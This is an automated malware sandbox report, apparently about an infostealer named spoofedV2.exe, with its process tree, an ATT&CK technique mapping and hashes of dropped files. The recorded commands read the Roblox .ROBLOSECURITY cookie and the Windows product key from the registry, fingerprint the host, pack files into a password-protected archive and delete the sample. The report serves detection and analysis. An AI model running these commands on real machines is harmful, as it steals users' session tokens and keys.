  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3740
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\VEIxy.zip" *"
    3⤵
    PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI43082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\VEIxy.zip" *
      4⤵
      Executes dropped EXE
      PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2832
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3684
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\spoofedV2.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1548
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1948

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8c114cc40,0x7ff8c114cc4c,0x7ff8c114cc58
  2⤵
  PID:1056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2
  2⤵
  PID:4276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1980,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:3
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2200,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:8
  2⤵
  PID:4796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:3168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4428,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3564 /prefetch:1
  2⤵
  PID:4120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4600,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:8
  2⤵
  PID:3756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4400 /prefetch:8
  2⤵
  PID:2496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4764,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:8
  2⤵
  PID:3856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:8
  2⤵
  PID:4984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8
  2⤵
  PID:3544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5104,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:8
  2⤵
  PID:4268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4648,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4656 /prefetch:8
  2⤵
  PID:2392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4996,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4556 /prefetch:8
  2⤵
  PID:4980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5392,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5316 /prefetch:2
  2⤵
  PID:3796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4836,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3456,i,18442550211170460108,12685058478401676670,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5320 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2312

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3348

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
1⤵
- Modifies system executable filetype association
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:848
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
  "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2284

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\334d4d3c-a0bd-4307-b226-e4b36f383245.tmp

Filesize
9KB

MD5
46119a98f6c4cd7a1bb24d28b3356388

SHA1
f34ab68e062622938171e9c366bacd0dd2016ea6

SHA256
b1f57c63470e984848b0e01753052efa09982c53a92580d1861aae30ac39e8b2

SHA512
e12ec58704f192226f11d5f3fa2b92b54cc3e1908bd84c1dc065da19d9eb807ebb4ee673fdfd9f0b632d9b25f878b223aa8fbc11f7f75654e804ddbd7c0cc219

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
068a58f5a279999951748a50442c9f62

SHA1
7ec750dc089bc7574e8154e7d4ef6e109e95b350

SHA256
6775cf8c9ff98ba0df1aa9d5b91f1380159234bfee83effb846c91493cf42b40

SHA512
57588fe0c66947108984cf2d4143823d986f036514ab1659f2a3ef5dd7dc48fd7eab6d96b5b30c1dc78765f62f1bb70b5dda57e5a95c65998ba13a1ea0be2e00

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
8d1c557c834f74b3a5d74e7229bf6d3d

SHA1
c27721084e42ef8ce4a60b1073ec7bddc81281f6

SHA256
11ecd9465b8a3a33d387ebd89a59bf44c989a8f37ee7197743c2070aa600a850

SHA512
5fd4c1717100f32f8211d14cbdd05e441f500130178b53497ead6feb9060c7838009b6188e3d6acf4f720c8a5428594d2fdbfe1e2c5a227abf1d3f57744ba2e1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
df80af8c03783442a1955ed8ba74040c

SHA1
0e37eaf6118b6e865c103604cf435fd1254a9be5

SHA256
eb9238ce9f7079adcabfaf1fac4643342678180aeed6f376667f31236471367e

SHA512
535622ee157ab397a7dbe0244cf3e722b7c5ce760bdede1330a5b6923c1e3e72b523fdc16e3792ad072949c670eb395e64b5105fac0b687379a0dd777c3d71f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
c4c8b57cad8e3d17a8b7288deebcba52

SHA1
288e8492c8145d8a94bad8d8c368858a301cd16f

SHA256
33b290acc45d591b4b58af35f35f44f248e06865fc89f860542da2248c43c774

SHA512
3cae1034b3bafc44550b8875fce0841e47865a66d2be7c4d7bf167fcd1cd8427f8be7aee80f19a178513e60dd06278457608a82b4c8e9b0e362ba0fa5cd7dc47

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5d80556d72fa3a801959c9a7decd6170

SHA1
d89438635e57d254efcbb729e243174744b3895d

SHA256
3186234732d2d3be9c508945969a1f77f4247102e681d2c5df56c2f07f162ba4

SHA512
459a5992c350e9aa1b534278f028c096ed7aece69822aff245512f8f18928b5d897660920667ad252e79bdd740e1cbf9e5299bb44398915cfeb7a14494f1c9ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
8f3137d57b785f0499cc626e62d53f3a

SHA1
d7b5a37fd826842fb4fad380f3429538676af6bc

SHA256
3faf52ec02195100df67d8269a8b8b1825cc8a5eeabbc8c4ee928374723e5f87

SHA512
585c3f7557c78ca94e91131e4eb90a0f0869cf09dee7b313ed63e81f10b65b59c1ca4fb1664fba57e3f5b34620c7ffef6e8324183e6112e435c773a5f5e2c729

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2adff7b3ccfc5109e9927ce63c5e8dc8

SHA1
5bd8240923c9ceb1d8c2e247ac7c091a5e20937a

SHA256
8c68699e5aca6abbd799864c74152d7b21233856356feb2ababcd8902dd90877

SHA512
23c721b6b9a10d85a4f8940d5e86a5b284b68bd1e196f68be2288295803a45b95ee06b724dc0b9d8ae4d7f82e1c280a537673b17afc01528283bd7c9adf452a7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e4aaa23120c013f6debe18298aeac985

SHA1
36b391c9002e297dad742d1f84be5ba57ca33328

SHA256
f9224119a7e3dbf3c7306b7b69b0be254d3256a0c29ce197389c39c4e4b54299

SHA512
531e6e781b2902f8bd87f75fa50839dfe4b6a9daae77293142a6845ee0d0ead934efedadd3b40fc8f27b290bb9fcce0f373875e974823b3741dfe251ca902c38

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
95a080ac3134462f152ee3c4c01a8240

SHA1
ef53d29b72bbe6f9fdd06b0bd13718112033608b

SHA256
cdba7a1e803067402d677685c3e021c97309648ce0abf8b0a9f7a4008f7d553b

SHA512
c48dfda38393d022d2a661edfa6837a117d9c53760c4527be7bf35cdc400a32a436b9300a865148e4a4d5df1f56c73d944818dfeed28c6e4f7e44bdd4dd414c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5c299dc0e6e4511bf44311a151acdff6

SHA1
7a02aa23084ec9d592f0c905d6bfc04c91305249

SHA256
491ff00516e43d627d77286b94f807f21406769bad2adde8b05a8649e623dc32

SHA512
d69ca81cb8076c1114f3bbc36be30bda9639d949ab0f2bcac6b99dceb2c82f6bf870dd94a88ff9b9b69c6e438a1650e2b847d026d842e56a644b1213e575fa1a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
294a3de37bd67824fe17f2ab125aa454

SHA1
d9ad6f184b96dbaebb14d77b79f10bc540be9575

SHA256
9c83db857a0b830d3a5b4bc2ed93c019b1af2fa66eccb956eae4b73a72d1aa37

SHA512
d8e8510db0184c5c8dd4ea910f2ab4ed053cdf56bacae1456baf92439356b517418feaad7d4d4181000fd7b9c9c8d40e51a3e60da06ee2ceff79aef8b83c81a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4337c3678392d9afa0f2d28bfb9fb6a4

SHA1
cedec47b4f3e26bf61d41475c91d729bf7357d85

SHA256
725331d7503971ac94334109a18495c430b0a32e526e5908bdcdc3b133d0d3a0

SHA512
dcd3b13bbed19f875a751013fa602ae82cbacc344fd65c1098704c049113a5322db4869da7dc9809bd2c3ec66c6da7374e515373c4b3f3282431900b5dac49ad

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
75d6dd5afc3a6408c8157a2191046ff8

SHA1
ea21312113716cf914506fa8bf6a6d9d336de738

SHA256
50a4718bc1042bac79b10fc147d7a91cdc0ea1eb5a6b985a086034ebb2957131

SHA512
e0eaca354eed7434f1db7e51bda326ba9bd1c0eabac6f7b5031ae0c9e5292d284cd9f147ed09050d03aed16ed6327bc75f7f969e9730efedd0bcb6c13848dea2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
683a7f3cf191aabbd5edd65a71fd2eeb

SHA1
6db1923b432bebac244e5220f81d66303243d694

SHA256
2a6c90b0ce9a9cca160a3ca7896a02a2c8247b1df1342677099cde6048730eec

SHA512
4e4f7ac420af6e99a0366d51275030dad5d769dadbd3c7fd7fba10652cdb70265e556c77ca05b97378546c9ca2a1d00cb9605be1f742ccf5c6e340f6c35b6e9b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
7094228150c96b4e278acec0244c6d49

SHA1
f2c95327287d48de225a9e111d18d8efc7c1f6a2

SHA256
4acb12cb0f128654a513e614a7c423d7863031f8673a1899c1d9b7f7eefe1e9b

SHA512
1a0160b3addadd3faa72e4a6689882cc75bdc38bfbe84c579bd086ccb87c55197f03f548a4a82f53d465ffd3e11cf938304bd6dd019de643d8f89154b1b73f2f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
1450624730e296b87ba63c5e16aa2210

SHA1
5fd5422f0a93abec04221cafbd38ddc19627b820

SHA256
1bf98a9f5104dc3113e28700b5686eecf4ab6ddb55ce9aa4517a297e4277d069

SHA512
b3e2fd9ba43d422ab7c86a67d4371ea39fc2356e8854ff8567e1889dc9ecaf08a7803420ee42942d03e678fc3409bed2cbdc89c217bfab034f9489c119e82771

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
232KB

MD5
46e4bb6b9346b8dbb66ba1eb1e76f359

SHA1
cef3da53310996a23efca629b248846d1442a269

SHA256
63d7197a3ba50edf001098560ee4a53364496758a53c2d45be8a4bc79fdb716f

SHA512
4768a13085b7f7795a18529f8c6811cfd112376ee068760eec9636da30df80a09e7588068e844af42473c509f355923e1f983f01f0617f79a6ec970ac894e492

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
ba2fe4c848b296294110e712acc6f821

SHA1
2c160a43ad6454a002da9454a838e56788b0f5fe

SHA256
647c0619b65be4e669129687dd84861d5edead517bab26da4d15b02a1e8a5fe2

SHA512
ef2644991aa26e383fd015a38a0f62e19197a62856ccbfda807edef8230a1ddf3b3b253aa57ae039e38f2ac89410901fb2b7b77e03b393b2a9657425e8456c49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
74e4a39ae145a98de20041613220dfed

SHA1
ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

SHA256
2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

SHA512
96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe

Filesize
40.2MB

MD5
fb4aa59c92c9b3263eb07e07b91568b5

SHA1
6071a3e3c4338b90d892a8416b6a92fbfe25bb67

SHA256
e70e80dbbc9baba7ddcee70eda1bb8d0e6612dfb1d93827fe7b594a59f3b48b9

SHA512
60aabbe2fd24c04c33e7892eab64f24f8c335a0dd9822eb01adc5459e850769fc200078c5ccee96c1f2013173bc41f5a2023def3f5fe36e380963db034924ace

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\PreSignInSettingsConfig.json

Filesize
63KB

MD5
e516a60bc980095e8d156b1a99ab5eee

SHA1
238e243ffc12d4e012fd020c9822703109b987f6

SHA256
543796a1b343b4ebc0285d89cb8eb70667ac7b513da37495e38003704e9d88d7

SHA512
9b51e99ba20e9da56d1acc24a1cf9f9c9dbdeb742bec034e0ff2bc179a60f4aff249f40344f9ddd43229dcdefa1041940f65afb336d46c175ffeff725c638d58

Download Submit
